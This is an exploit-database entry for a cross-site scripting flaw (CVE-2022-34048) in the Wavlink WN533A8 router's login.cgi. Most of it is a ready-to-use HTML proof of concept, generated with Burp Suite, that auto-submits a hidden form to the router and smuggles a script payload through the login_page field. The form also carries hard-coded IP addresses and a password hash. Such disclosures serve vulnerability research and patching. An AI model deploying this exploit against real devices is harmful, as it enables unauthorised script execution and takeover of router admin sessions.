Wavlink WN533A8 Cross Site Scripting

2022.08.02
Credit: Ahmed Alroky
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS) # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34048 # Tested on: Windows # Poc code <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"> <input type="hidden" name="newUI" value="1" /> <input type="hidden" name="page" value="login" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="langChange" value="0" /> <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" /> <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" /> <input type="hidden" name="homepage" value="main&#46;shtml" /> <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" /> <input type="hidden" name="wizardpage" value="wiz&#46;shtml" /> <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" /> <input type="hidden" name="key" value="M94947765" /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /> <input type="hidden" name="lang&#95;select" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top